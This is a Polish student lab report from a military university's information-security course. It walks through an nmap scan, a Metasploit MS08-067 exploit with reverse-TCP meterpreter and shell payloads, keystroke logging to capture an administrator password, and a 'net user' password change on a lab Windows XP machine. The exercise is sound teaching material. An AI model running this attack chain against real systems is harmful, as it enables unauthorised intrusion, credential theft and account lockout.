W

OJSKOWA 

A

KADEMIA 

T

ECHNICZNA

 

 
 
 
 
 

Podstawy bezpieczeństwa informacji 

 

Sprawozdanie z ćwiczeń laboratoryjnych nr 1. 

 
 

 
 
 
 
 
 
 

 
 
 
 
Prowadzący: mgr inż. Bartosz Kryński 

 
Wykonali: 
 

Jakub Łochocki 
Grupa: I9M1S1 
Nr albumu: 45303 

 

Mateusz Fruba 
Grupa: I9M1S1 
Nr albumu: 45261 

Treść zadania  

1. 

Włączyć z płyty wersję LiveCD system Backtrack, następnie za pomocą narzędzia 

nmap 

przeskanować całą sieć lokalną w poszukiwaniu komputera z innym systemem 

operacyjnym niż Backtrack. 

2. 

Następnie sprawdzić, czy na w/w komputerze jest otwarty port 8080. 

3. 

Wykorzystać exploit-a w celu przechwyceniu hasła administratora (tzw. Keylogger). 

4. 

Wykorzystać exploit-a w celu zdalnej i nieautoryzowanej zmiany hasła administratora.  

Wykonanie 

Opis narzędzi 

BackTrack  to specjalistyczna dystrybuc

ja  Linuksa  szczególnie  ceniona  wśród 

specjalistów IT i audytorów zabezpieczeń. Dystrybucja ta stanowi unikatowy zbiór kilkuset 
profesjonalnych,  bardzo  różnorodnych  narzędzi  do  monitorowania  i  analizy  ruchu 

sieciowego, zbierania informacji na temat sieci i 

znajdujących się  w niej urządzeń, a także 

kontroli stanu zabezpieczeń sieci i ich łamania oraz przeprowadzania testów penetracyjnych. 
BackTrack  zawiera  wbudowane  sterowniki  do  większości  najpopularniejszych  sieciowych 
kart bezprzewodowych, dzięki czemu można go uruchomić na praktycznie każdym notebooku 
i od razu przystąpić do pracy - bez instalacji na komputerze, bez pozostawiania jakichkolwiek 
śladów aktywności. Narzędzie nmap służy do skanowania sieci pod kątem otwartych portów 
oraz użytkowanych usług. Metasploit jest natomiast narzędziem wykorzystywanym do testów 
penetracyjnych  i  łamania  zabezpieczeń  systemów  teleinformatycznych.  Metasploit  posiada 
bazę  gotowych  exploitów  oraz  udostępnia  interfejs,  dzięki  któremu  można  przygotowywać 
własne,  korzystając  z gotowych komponentów.  Exploit  jako  narzędzie  pozwala  poprzez 
wykorzystanie  błędów  i  luki  w  oprogramowaniu  na  uzyskanie  dostępu  nad  daną  maszyną. 
Natomiast moduł ms08_067 jest w stanie wykorzystać krytyczny błąd w zabezpieczeniach. 

Eksploatacja luki poleg

a na wysłaniu do serwera specjalnie spreparowanego zapytania RPC, 

co  może  prowadzić  do  zdalnego  wykonania  kodu  i  w  efekcie  do  przejęcia  kontroli  nad 

atakowanym systemem. 

Warunkiem  udanego  włamania  jest  brak  w  systemie  poprawki 

bezpieczeństwa KB921883. 

 

 

 

P

rzebieg ćwiczenia 

Ćwiczenie  rozpocząłem  od  uruchomienia  płyty  z systemem Backtrack.  Po 

uruchomieniu systemu się systemu rozpocząłem poszukiwania komputera (celu ataku): 

• 

Wywołanie komendy nmap –A –vv –p 8080 10.3.236.* gdzie: 

  A – agresywne opcje skanowania, 

  vv - 

podwyższenie poziomu, 

  p – skanowanie po danych zakresie portów, 

•  Komputer, cel ataku 

posiadał adres IP 10.3.236.107, działał na systemie 

operacyjnym Windows XP z SP2 PL.  

Następnie uruchomiłem środowisko metasploit za pomocą komendy msfconsole oraz 

wy

korzystałem exploit – celem jest hasło użytkownika systemu (rys. 1):

 

•  msf > svn update - aktualizacyjnego 

środowiska Metasploit 

•  msf > use exploit/windows/smb/ms08_067_netapi - 

wejście w tryb 

konfiguracji modułu exploitu 

•  msf exploit(ms08_067_netapi) > set RHOST 10.3. 236.107 - ustawienie adresu 

IP docelowego 

•  msf exploit(ms08_067_netapi) > set LHOST 10.3. 236.113 - ustawienie adresu 

IP naszego systemu 

•  msf exploit(ms08_067_netapi) > set PAYLOAD 

windows/meterpreter/reverse_tcp  - 

wybór oraz wejście w tryb konfiguracji 

modułu payloadu 

•  msf exploit(ms08_067_netapi) > exploit  - uruchomiemie exploitu 

ms08_067_netapi 

 

 

 

 

 

 

Rys. 1. Wykorzystanie środowiska metasploit. 

 

Dalej 

po uzyskaniu dostępu do exploita, pozyskaliśmy hasło do systemu (rys.2): 

•  meterpreter > ps – m - 

wyświetlenie wszystkich uruchomionych procesów na 

atakowanym komputerze 

•  meterpreter > migrate 660 – 

włączenie się do procesu o numerze 660 

• 

meterpeter > keyscan_start (włączenie nasłuchiwania naciśniętych klawiszy) 

• 

meterpreter > keyscan_dump (wyświetlenie przechwyconych znaków) 

Rys.2. 

Pozyskanie hasła 

 

 

 

 

Następnie dokonałem zmiany hasła administratora: 

•  msf > svn update - uruchomienie procesu aktualizacyjnego Metasploit 
•  msf > use exploit/windows/smb/ms08_067_netapi - 

wejście w tryb 

konfiguracji 

modułu exploitu ms08_067_netapi 

•  msf exploit(ms08_067_netapi) > set RHOST 10.3.237.191 - ustawienie adresu 

IP docelowego komputera 

•  msf exploit(ms08_067_netapi) > set LHOST 10.3.237.105 - ustawienie adresu 

IP naszego systemu 

•  msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp - 

wejście w tryb konfiguracji modułu payloadu shell /reverse_tcp 

•  msf exploit(ms08_067_netapi) > exploit - uruchomiemie exploitu 

ms08_067_netapi 

Wykonane  polecenia  pozwoliły  na  uzyskanie  dostęp  do  interpretera  poleceń  cmd.exe. 
Wywołanie polecenia C:\Windows\System32\net user Clico nowehaslo pozwoliło na zmianę 
hasła użytkownika Clico. 

Wnioski 

Backtrack jako dystrybucja Linuxa, oparta o Ubuntu 

zawiera narzędzia do testowania i 

łamania  zabezpieczeń  systemów  komputerowych.  Wykorzystując  słabość  zabezpieczeń 
komputerów  możemy  uzyskiwać  nad  nimi  kontrolę.  To  właśnie  było  celem  naszego 
ćwiczenia. 

Podczas 

ćwiczenia uzyskaliśmy dostęp do systemu komputera, który był celem ataku. 

Umożliwiło  nam  to  narzędzie  Metasploit,  które  służy  do  testów  penetracyjnych  i  łamania 
zabezpieczeń  systemów  teleinformatycznych.  Metasploit  posiada  bazę  gotowych  exploitów 
oraz  udostępnia  interfejs,  dzięki  któremu  można  przygotowywać  własne,  korzystając  z 

gotowych komponentów. 

Dokonaliśmy odczytania i zmiany hasła administratora. Ćwiczenie 

zostało  przeprowadzone  prawidłowo.  Zmiana  hasła  uniemożliwiła  dostęp  do  atakowanego 

komputera.